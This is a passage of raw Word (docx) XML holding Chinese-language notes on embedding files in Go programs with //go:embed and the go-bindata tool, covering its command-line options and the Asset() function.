      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA88482" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0494B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>_ "embed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F388277" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1B5E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBE18B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>//go:embed hello.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226852B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var b []byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738DE77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB3B5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E17192" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEC195" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E55F47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B84DAB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc159779820"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/go-bindata/go-bindata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：打包文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w14:paraId="62C799F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git: https://github.com/go-bindata/go-bindata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A5965" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我将该目录下载下来，进入包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F44829" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后讲编译后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go-bindata.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cobra-cli.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同目录文件，这样就可以像执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra-cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令一样随意的执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go-bindata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681503E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F04467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定包名运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00920403">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Lucida Console" w:hAnsi="Lucida Console" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go-bindata.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00920403">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -pkg bindata</w:t>
      </w:r>
      <w:r w:rsidRPr="00920403">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Lucida Console" w:hAnsi="Lucida Console" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o n_all_kill.go default.toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CC9C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B55D780" w14:textId="27AEACA6" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果打包两个文件到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中：</w:t>
      </w:r>
      <w:r w:rsidRPr="00920403">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go-bindata.exe -pkg bindata -o n_all_kill.go default.toml american-english</w:t>
      </w:r>
      <w:r w:rsidR="00517778" w:rsidRPr="00920403">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00240243" w:rsidRPr="00920403">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KeyboardWalk.txt</w:t>
      </w:r>
      <w:r w:rsidR="006F6FA3" w:rsidRPr="00920403">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> passwordtop100.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738F4CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F148296" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用时，直接代码中：</w:t>
      </w:r>
      <w:r>
        <w:t>data, err := Asset("pub/style/foo.css")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面跟本来的、打包前的文件名即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E2A928" w14:textId="5F7FC3FE" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A63474B" w14:textId="402BA326" w:rsidR="00167874" w:rsidRPr="00920403" w:rsidRDefault="00920403" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥的命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00920403">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go-bindata -o=bindata/bindata.go -ignore="\\.DS_Store|desktop.ini|README.md" -pkg=bindata -prefix=rules rules/...</w:t>
      </w:r>
      <w:r w:rsidR="00167874">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="002676E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="002676E5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r w:rsidR="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>意思是，如果打包</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="002676E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="002676E5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ules/*</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录，再使用</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>indata.asset(“rules/xxx”)</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接简写为</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>indata.asset(“xxx”)</w:t>
      </w:r>
      <w:r w:rsidR="00167874" w:rsidRPr="00167874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就可以了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D310C40" w14:textId="77777777" w:rsidR="00920403" w:rsidRDefault="00920403" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02803642" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换是在一组或多组文件上完成的。它们都嵌入在一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件中，还有一个目录和一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Asset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，允许根据其名称快速访问资产。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE2379" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329393DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最简单的调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bindata.go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在当前工作目录中生成一个文件。它包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中的所有资</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>产。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629BFA2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D9D287" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ go-bindata data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E40FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要递归地包含所有输入子目录，请使用为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入路径定义的省略号后缀。否则它只会考虑输入目录本身的资产。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFE960" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5868DBF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ go-bindata data/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CAA51C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要指定正在生成的输出文件的名称，我们使用以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D06F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20717C90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ go-bindata -o myfile.go data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC46EC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果需要，可以指定多个输入目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA0F7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0691611E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ go-bindata dir1/... /path/to/dir2/... dir3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247778B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下段落详细介绍了一些可以提供给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go-bindata. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请参阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>testdata/out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中的资产的各种输出示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>testdata/in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。每个示例使用不同的命令行选项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1D973" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BFF554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要忽略文件，请使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -ignore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入正则表达式，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34338E94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ go-bindata -ignore=\\.gitignore data/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F18F4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26130DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400B975" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>data, err := Asset("pub/style/foo.css")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD790E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEA7C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Asset was not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6C65E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C84FEF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDE4A1C" w14:textId="321D7DFA" w:rsidR="00F761EF" w:rsidRDefault="00F761EF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨目录打包坑点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F78585" w14:textId="37C8C9B7" w:rsidR="001321FE" w:rsidRPr="001321FE" w:rsidRDefault="001321FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了避免</w:t>
      </w:r>
      <w:r w:rsidR="0015146D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过去</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要手动对配置文件进行</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>embed</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的单独行为的方式，后来将这部分工作与</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:t xml:space="preserve">go build main.go </w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工作放一块儿了，</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:t>uild.bat</w:t>
      </w:r>
      <w:r w:rsidR="00F842FB">
        <w:rPr>
